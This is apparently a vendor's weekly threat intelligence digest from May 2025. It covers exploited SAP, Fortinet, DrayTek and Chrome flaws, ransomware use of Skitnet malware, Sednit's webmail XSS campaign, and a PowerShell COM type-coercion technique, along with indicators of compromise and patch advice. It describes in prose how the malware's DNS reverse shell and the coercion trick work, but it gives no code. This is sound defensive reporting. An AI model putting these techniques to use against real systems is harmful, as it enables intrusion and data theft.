Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
BianLian and RansomEXX Exploit SAP NetWeaver Vulnerability CVE-2025-31324 for Remote Code Execution - On May 14, 2025, ReliaQuest updated its assessment of CVE-2025-31324, an unrestricted file upload vulnerability in SAP NetWeaver Visual Composer that allows unauthenticated uploads and remote code execution. Initial reporting on April 22, 2025, suggested a remote file inclusion vulnerability, though subsequent analysis aligned activity with CVE-2017-9844 due to behavioural similarities.
SAP confirmed that the vulnerability involved unrestricted file uploads and released a patch on April 24, 2025. SAP Visual Composer, deprecated since 2015, was the affected component.
The report attributed exploitation activity to ransomware groups BianLian and RansomEXX. BianLian used a reverse proxy infrastructure that investigators linked to previously identified command-and-control (C2) servers. RansomEXX was identified in a separate incident involving post-exploitation activity. ReliaQuest observed these actions but noted that threat actors had not successfully deployed ransomware payloads during the incidents.
Fortinet Patches Actively Exploited Vulnerability Tracked as CVE-2025-32756 - On May 13, 2025, Fortinet patched an actively exploited stack-based buffer overflow flaw, CVE-2025-32756, in FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera products. CVE-2025-32756, exploited as a zero-day to target FortiVoice enterprise phone systems, can be exploited for remote code execution (RCE) to allow unauthenticated threat actors to execute arbitrary code by sending specially crafted HTTP requests to the device.
In Fortinet’s case, signs of exploitation included network scans, deletion of system crash logs, and the enabling of the fcgi debugging diagnostic feature, which was used to capture system or SSH credentials. Attackers may have also deployed malware, modified cron jobs to harvest credentials, and dropped network scanning scripts on compromised devices.
CISA Adds Three Vulnerabilities Affecting DrayTek Vigor Routers, Google Chrome, and SAP NetWeaver Visual Composer to Its Known Exploited Vulnerabilities Catalogue - On May 15, 2025, the US Cybersecurity and Infrastructure Security Agency added three vulnerabilities affecting products from DrayTek, Google, and SAP to its Known Exploited Vulnerabilities (KEV) catalogue. Technical details surrounding these vulnerabilities are as follows:
- CVE-2024-12987 is an OS command injection vulnerability in DrayTek Vigor2960 and Vigor300B (version 1.5.1.4). Successful exploitation could allow threat actors to execute arbitrary commands, enabling them to alter configurations, access sensitive data, or infiltrate internal networks.
- CVE-2025-4664 is an insufficient policy enforcement flaw in Chrome’s Loader component. Successful exploitation allows threat actors to access sensitive information from websites the victim is logged into by opening a maliciously crafted HTML page.
- CVE-2025-42999 is a deserialization of untrusted data vulnerability in SAP NetWeaver Visual Composer. Successful exploitation could allow threat actors to upload malicious content that could compromise the host system.
Potential Threats
BlackBasta and Cactus Ransomware Groups Use New Skitnet Malware for Post-Exploitation - On May 16, 2025, BleepingComputer reported that ransomware groups, including BlackBasta and Cactus, used the backdoor malware Skitnet (also known as Bossnet) in enterprise phishing intrusions via Microsoft Teams.
The malware is used post-compromise to maintain access, execute remote commands, and communicate with command-and-control (C2) infrastructure. On April 4, 2025, Prodaft released a technical analysis identifying the developer of the malware as the threat actor LARVA-306. The report also noted that the malware was first advertised by threat actors on the RAMP forum in April 2024.
Russia-aligned Sednit Group Conducting Espionage Campaign Dubbed RoundPress Exploiting XSS Vulnerabilities on High-Value Webmail Servers - On May 15, 2025, ESET reported that threat group Sednit (aka BlueDelta) ran Operation RoundPress, an espionage campaign from 2023–2024 targeting government and defence entities across Europe, Africa, and South America. The group exploited vulnerabilities in webmail platforms Horde, MDaemon, RoundCube, and Zimbra to deliver tailored variants of their SpyPress malware via spearphishing emails using XSS exploits.
Each variant was customised to the targeted platform:
- SpyPress.Horde: Stole credentials via an unspecified flaw.
- SpyPress.MDaemon: Used CVE-2024-11182 to steal credentials, emails, contacts, 2FA secrets, and maintain access.
- SpyPress.RoundCube: Used CVEs 2020-35730 and 2023-43770 to steal data and forward future emails via Sieve rules.
- SpyPress.Zimbra: Used CVE-2024-27443 to steal emails and contacts.
Living-off-the-COM-Type-Coercion-Abuse, PoC Tool for Stealthy Command Execution via COM Type Coercion Abuse - On May 16, 2025, researcher Andrea Bocchetti (andreisss on GitHub) released a proof-of-concept tool called Living-off-the-COM-Type-Coercion-Abuse. It shows how attackers can exploit PowerShell’s .NET and COM automation features to stealthily run commands by abusing implicit type coercion.
The trick involves creating a custom object with an overridden .ToString() method that returns a command. When passed to a COM method like ShellExecute() expecting a string, PowerShell auto-calls .ToString(), executing the command. Bocchetti demonstrated this by using a C# class returning calc.exe, which gets executed via Shell.Application.
The technique bypasses standard PowerShell monitoring and has drawn some attention on GitHub.
General News
UK government confirms massive data breach following hack of Legal Aid Agency - Britain’s Ministry of Justice (MoJ) confirmed on Monday that hackers had “accessed a large amount of information” from people who had applied for legal aid, potentially including their criminal histories. According to the MoJ statement, everyone in England and Wales who applied for legal aid using the Legal Aid Agency’s online platform since 2010 may be affected.
Legal aid applicants “will include some of the most vulnerable people in our society,” said Gareth Mott, a research fellow at the Royal United Services Institute think tank and former lecturer in security and intelligence at the University of Kent.
The perpetrators of the data extortion incident claim to have data on more than 2 million people. The hackers have threatened to publish this data online in what would amount to one of the most significant data breaches to ever impact the British criminal justice system.
EU court rules that tracking-based online ads are illegal - The Brussels Court of Appeal ruled that the current consent model used by online advertisers, especially the Transparency and Consent Framework, violates the EU’s GDPR. This impacts big tech companies like Google, Amazon, Microsoft, and X, whose consent pop-ups were found inadequate for protecting user privacy during real-time bidding, where personal data is rapidly shared for targeted ads.
Amnesty International called the ruling a big win for privacy, urging a move away from surveillance-based ads. Meanwhile, ad fraud is rising. Meta was linked to nearly half of scam ads on Zelle in 2023–2024, and internal reports show most new Meta advertisers promoted scams or low-quality products.
23andMe sold for $256 million as buyer pledges to comply with existing privacy policies - Regeneron is acquiring key assets of 23andMe, including its genetic testing services and biobank, in a $256 million deal after the company filed for bankruptcy. Regeneron has promised to honour 23andMe’s existing privacy policies, which restrict sharing genetic data without legal orders and allow users to delete their information. Still, the deal has sparked public concern about how this highly sensitive data might be used in the future.
Privacy advocates, lawmakers, and the FTC have all voiced worries that consumers never fully consented to having their genetic data sold or used beyond personal health and genealogy purposes. A court-appointed privacy ombudsman will review the transaction, with a report due by June 10. In the wake of 23andMe’s bankruptcy, there’s been a sharp rise in users requesting their data be deleted.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group’s severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| BlueDelta | ● High | → | ● High | ● 84 | → | ● 86 | ● 25 | → | ● 25 |
| CL0P Ransomware Group | ● High | → | ● High | ● 83 | → | ● 82 | ● 49 | → | ● 49 |
| Kimsuky | ● High | → | ● High | ● 93 | → | ● 92 | ● 30 | → | ● 30 |
| FIN7 | ● High | → | ● High | ● 80 | → | ● 79 | ● 25 | → | ● 25 |
| Sentp | NEW | → | ● Basic | NEW | → | ● 40 | NEW | → | ● 30 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren’t disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions,
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | ||||
|---|---|---|---|---|---|---|---|
| Chinese Hackers | ▲ |
Backdoor |
▲ | CVE-2025-4664 | ▲ |
CoinBase |
▲ |
|
Distributed Denial of Secrets |
▲ |
Cross-Site Scripting |
▲ | CVE-2020-1472 | ▲ |
China |
▲ |
|
National Crime Agency |
▲ |
Social Engineering |
▲ | CVE-2025-36560 | ▲ |
UK Government |
▲ |
|
Rhysida Ransomware Group |
▲ |
SnipVex |
▲ | CVE-2025-4427 | ▲ |
Legal Aid Agency |
▲ |
|
Scattered Spider |
▲ |
Spear Phishing |
▲ |
CVE-2025-11882 |
▲ |
SK Telecom |
▲ |
Prominent Information Security Events
BlackBasta and Cactus Ransomware Groups Use New Skitnet Malware for Post-Exploitation
Source: Insikt Group | Validated Intelligence Event
IOC: SHA256 - a49fcd38da4a23acfe70c702fbe7b323eb5449fee15150cb0414b08c8a2cd8ee
IOC: SHA256 - 2455feb8790635850f2637e1e980d3aa390eefd10fd7048c28f6a075ef0b50aa
IOC: SHA256 - 37e4db74f8fed20689d35f4fc846cc8a73d594354336e4445338f9bd3e537076
On May 16, 2025, BleepingComputer reported that ransomware groups, including BlackBasta and Cactus, used the backdoor malware Skitnet (also known as Bossnet) in enterprise phishing intrusions via Microsoft Teams.
The malware is used post-compromise to maintain access, execute remote commands, and communicate with command-and-control (C2) infrastructure. On April 4, 2025, Prodaft released a technical analysis identifying the developer of the malware as the threat actor LARVA-306. The report also noted that the malware was first advertised by threat actors on the RAMP forum in April 2024.
According to the Prodaft report, Skitnet uses a Rust-based first-stage payload that decrypts and maps a ChaCha20-encrypted Nim binary into memory using the DInvoke-rs library. The Nim payload establishes a DNS-based reverse shell by launching a cmd.exe process and creating three threads: one sends DNS queries to the C2 server every ten seconds, another captures and exfiltrates shell output, and the main thread waits for DNS responses containing threat actor commands.
It builds DNS queries with random hexadecimal values using the nim-dnsprotocol library and resolves Windows API functions at runtime using GetProcAddress to evade static analysis. The C2 panel displays metadata for each infected host, including IP address, device ID (based on the C drive serial number), and system status.
Russia-aligned Sednit Group Conducting Espionage Campaign Dubbed RoundPress Exploiting XSS Vulnerabilities on High-Value Webmail Servers
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - b6c340549700470c651031865c2772d3a4c81310
IOC: IP - 111[.]90[.]151[.]167
IOC: IP - 185[.]225[.]69[.]223
IOC: IP - 45[.]137[.]222[.]24
On May 15, 2025, ESET reported with medium confidence that Sednit (also tracked by Recorded Future as BlueDelta) conducted Operation RoundPress, an espionage campaign that exploited vulnerabilities in webmail platforms such as Horde, MDaemon, RoundCube, and Zimbra. This attribution is based on observed tactics, techniques, and procedures (TTPs) consistent with BlueDelta’s previous operations. Active between 2023 and 2024, Operation RoundPress targeted governmental and defence entities across Europe, Africa, and South America.
BlueDelta’s infection chain begins with spearphishing emails carrying malicious Javascript code designed to exploit cross-site scripting (XSS) vulnerabilities in webmail platforms. When victims open a malicious email in a vulnerable webmail interface, the exploit triggers and delivers previously undocumented variants of the information-stealing malware SpyPress. The deployed variants depend on the webmail platform used by the victim and are as follows:
- SpyPress.Horde: BlueDelta exploited an unspecified flaw in Horde to deploy SpyPress.HORDE. The malware steals webmail credentials.
- SpyPress.MDaemon: BlueDelta exploited CVE-2024-11182 (patched November 14, 2024) in MDaemon to deploy SpyPress.MDAEMON. The malware steals webmail credentials, emails, contact lists, login history, and two-factor authentication (2FA) secrets, and creates an application password to maintain persistent access.
- SpyPress.RoundCube: BlueDelta exploited CVE-2020-35730 and later CVE-2023-43770 (patched September 14, 2023) in Roundcube to deploy SpyPress.ROUNDCUBE. The malware steals webmail credentials, messages, address books, and about-page data, and installs a Sieve rule to forward future emails to BlueDelta-controlled command-and-control (C2) servers.
- SpyPress.Zimbra: BlueDelta exploited CVE-2024-27443 (patched March 1, 2024) in Zimbra to deliver
- SpyPress.ZIMBRA. The malware steals webmail credentials, contacts, and email messages.
All variants exfiltrate compromised data via HTTPS POST requests to BlueDelta-controlled C2 servers.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2025-31324: Install the patch SAP released on April 24, 2025 that specifically addresses CVE-2025-31324.
- CVE-2025-32756: Apply the May 13, 2025 Fortinet patch to all affected devices
- CVE-2025-42999, CVE-2025-4664, CVE-2024-12987.: apply the available patch for these vulnerabilities if the affected products are part of their tech stack. Please refer to the validation sources in this Analyst Note for the initial report on the exploitation of CVE-2025-42999 and CVE-2025-4664, as well as the disclosure of CVE-2024-12987.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.